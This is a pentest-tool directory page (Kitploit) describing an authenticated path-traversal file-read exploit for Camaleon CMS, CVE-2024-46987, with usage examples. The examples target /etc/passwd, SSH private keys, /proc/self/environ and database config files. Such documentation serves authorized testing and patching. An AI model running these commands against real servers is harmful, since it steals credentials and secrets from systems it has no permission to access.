Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-46987 — CVE-2024-46987 - Camaleon CMS LFI Exploit | Kitploit
Tools/GitHubGitHub/rival420/cve-2024-46987
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubrival420/cve-2024-46987

CVE-2024-46987

CVE-2024-46987 - Camaleon CMS LFI Exploit

View Repository
6 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-46987 - Camaleon CMS Local File Inclusion

Authenticated Local File Inclusion (LFI) exploit for Camaleon CMS.

Vulnerability

Camaleon CMS is vulnerable to an authenticated LFI attack through the /admin/media/download_private_file endpoint. The file parameter is not properly sanitized, allowing path traversal to read arbitrary files from the server.

Affected Versions

  • Camaleon CMS < 2.8.2

Requirements

root@kitploit:~
pip install requests

Usage

root@kitploit:~
# Print file to terminal (default)
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token"

# Save to file
python3 exploit.py -u http://example.com -f /etc/passwd -t "auth_token" -o passwd.txt

Parameters

Examples

root@kitploit:~
# Read passwd file
python3 exploit.py -u https://example.com -f /etc/passwd -t "auth_token"

# Read SSH keys
python3 exploit.py -u https://example.com -f /home/user/.ssh/id_rsa -t "auth_token" -o id_rsa

# Read environment variables
python3 exploit.py -u https://example.com -f /proc/self/environ -t "auth_token"

# Read application config
python3 exploit.py -u https://example.com -f /var/www/html/config/database.yml -t "auth_token"

Disclaimer

This tool is intended for authorized security testing and educational purposes only. Only use against systems you have explicit permission to test.

References

  • CVE-2024-46987
  • Camaleon CMS
Download Tool
ParameterDescription
-u, --urlTarget URL
-f, --fileFile to read (e.g., /etc/passwd)
-t, --tokenauth_token cookie value
-o, --outputOutput filename (optional, prints to terminal if not set)